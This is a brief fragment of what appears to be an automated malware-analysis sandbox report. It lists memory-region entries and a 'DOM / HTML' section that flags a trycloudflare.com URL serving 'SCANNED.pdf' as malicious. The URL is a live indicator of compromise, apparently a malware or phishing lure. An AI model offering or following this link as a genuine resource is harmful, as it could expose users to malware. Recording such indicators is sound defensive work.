page read and write
D00CC7B000
stack
page read and write
D00E8FE000
unkown
page readonly
AA279FE000
stack
page read and write
There are 492 hidden memdumps, click here to show them.

DOM / HTML

URL
Malicious
https://floor-contemporary-genius-accommodation.trycloudflare.com/SCANNED.pdf
https://floor-contemporary-genius-accommodation.trycloudflare.com/SCANNED.pdf